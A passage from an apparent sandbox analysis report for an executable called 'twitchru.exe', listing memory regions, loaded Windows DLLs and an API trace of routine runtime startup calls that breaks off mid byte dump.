end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 386 start_va = 0x2820000 end_va = 0x2a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 387 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 388 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 389 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 390 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 391 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 392 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 393 start_va = 0x77ab0000 end_va = 0x77c24fff entry_point = 0x77ab0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 394 start_va = 0x76d30000 end_va = 0x76d3dfff entry_point = 0x76d30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 395 start_va = 0x2710000 end_va = 0x271ffff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 396 start_va = 0x2a20000 end_va = 0x2b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a20000" filename = "" Region: id = 397 start_va = 0x2b20000 end_va = 0x2b33fff entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 398 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 399 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 400 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 401 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 402 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 403 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 404 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 405 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 406 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 407 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 408 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 409 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 410 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 411 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 412 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 413 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 414 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 415 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 416 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 417 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 418 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 419 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 420 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 421 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 422 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 423 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 424 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 425 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 426 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 427 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 428 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 429 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 430 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 431 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 432 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 433 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 434 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 435 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 436 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 437 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 438 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 439 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 440 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 441 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 442 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 443 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 444 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 445 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 446 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 447 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 448 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 449 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 450 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 451 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 452 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 453 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 454 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 455 start_va = 0x2710000 end_va = 0x2717fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 568 start_va = 0x2b20000 end_va = 0x2b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 569 start_va = 0x2b60000 end_va = 0x2c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 570 start_va = 0x7fea7000 end_va = 0x7fea9fff entry_point = 0x0 region_type = private name = "private_0x000000007fea7000" filename = "" Region: id = 571 start_va = 0x74780000 end_va = 0x74792fff entry_point = 0x74780000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 572 start_va = 0x74750000 end_va = 0x7477efff entry_point = 0x74750000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 573 start_va = 0x74730000 end_va = 0x74748fff entry_point = 0x74730000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 574 start_va = 0x74700000 end_va = 0x74727fff entry_point = 0x74700000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 575 start_va = 0x2710000 end_va = 0x2710fff entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 576 start_va = 0x2c60000 end_va = 0x2c60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c60000" filename = "" Region: id = 577 start_va = 0x2c60000 end_va = 0x2c6dfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c60000" filename = "" Region: id = 578 start_va = 0x2c60000 end_va = 0x2c65fff entry_point = 0x0 region_type = private name = "private_0x0000000002c60000" filename = "" Region: id = 579 start_va = 0x2c70000 end_va = 0x2cecfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c70000" filename = "" Region: id = 580 start_va = 0x2c60000 end_va = 0x2c60fff entry_point = 0x0 region_type = private name = "private_0x0000000002c60000" filename = "" Region: id = 581 start_va = 0x2c70000 end_va = 0x2c71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c70000" filename = "" Region: id = 582 start_va = 0x2c60000 end_va = 0x2c60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c60000" filename = "" Region: id = 583 start_va = 0x2c70000 end_va = 0x2c76fff entry_point = 0x0 region_type = private name = "private_0x0000000002c70000" filename = "" Region: id = 584 start_va = 0x2c80000 end_va = 0x2c80fff entry_point = 0x0 region_type = private name = "private_0x0000000002c80000" filename = "" Thread: id = 1 os_tid = 0x898 [0069.474] GetStartupInfoA (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0069.479] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0069.479] GetProcAddress (hModule=0x75260000, lpProcName="FlsAlloc") returned 0x7527a330 [0069.479] GetProcAddress (hModule=0x75260000, lpProcName="FlsGetValue") returned 0x75277580 [0069.479] GetProcAddress (hModule=0x75260000, lpProcName="FlsSetValue") returned 0x75279910 [0069.479] GetProcAddress (hModule=0x75260000, lpProcName="FlsFree") returned 0x7527f400 [0069.479] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0069.480] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x77cff190 [0069.480] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0069.480] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x77cff190 [0069.481] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0069.481] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x77cff190 [0069.481] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0069.481] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x77cff190 [0069.481] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0069.481] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x77cff190 [0069.481] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0069.481] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x77cff190 [0069.482] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0069.482] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x77cff190 [0069.482] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0069.482] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x77cfa200 [0069.482] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0069.483] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x77cfa200 [0069.483] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0069.483] GetProcAddress (hModule=0x75260000, lpProcName="EncodePointer") returned 0x77cff190 [0069.483] GetProcAddress (hModule=0x75260000, lpProcName="DecodePointer") returned 0x77cfa200 [0069.483] GetCurrentThreadId () returned 0x898 [0069.483] GetStartupInfoA (in: lpStartupInfo=0x19fe9c | out: lpStartupInfo=0x19fe9c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0069.483] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0069.483] GetFileType (hFile=0x38) returned 0x2 [0069.483] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0069.483] GetFileType (hFile=0x3c) returned 0x2 [0069.483] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0069.483] GetFileType (hFile=0x40) returned 0x2 [0069.483] SetHandleCount (uNumber=0x20) returned 0x20 [0069.483] GetCommandLineA () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe\" " [0069.483] GetEnvironmentStringsW () returned 0x5bc3f0* [0069.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1331, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1331 [0069.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1331, lpMultiByteStr=0x20d0fd0, cbMultiByte=1331, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1331 [0069.484] FreeEnvironmentStringsW (penv=0x5bc3f0) returned 1 [0069.484] GetLastError () returned 0x0 [0069.484] SetLastError (dwErrCode=0x0) [0069.484] GetLastError () returned 0x0 [0069.484] SetLastError (dwErrCode=0x0) [0069.484] GetLastError () returned 0x0 [0069.484] SetLastError (dwErrCode=0x0) [0069.484] GetACP () returned 0x4e4 [0069.484] GetLastError () returned 0x0 [0069.484] SetLastError (dwErrCode=0x0) [0069.484] IsValidCodePage (CodePage=0x4e4) returned 1 [0069.484] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0069.484] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0069.484] GetLastError () returned 0x0 [0069.484] SetLastError (dwErrCode=0x0) [0069.484] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x19f8d8 | out: lpCharType=0x19f8d8) returned 1 [0069.484] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.484] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ역BĀ") returned 256 [0069.484] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ역BĀ", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0069.485] GetLastError () returned 0x0 [0069.485] SetLastError (dwErrCode=0x0) [0069.485] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0069.485] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.485] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0069.485] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0069.485] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0069.485] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\x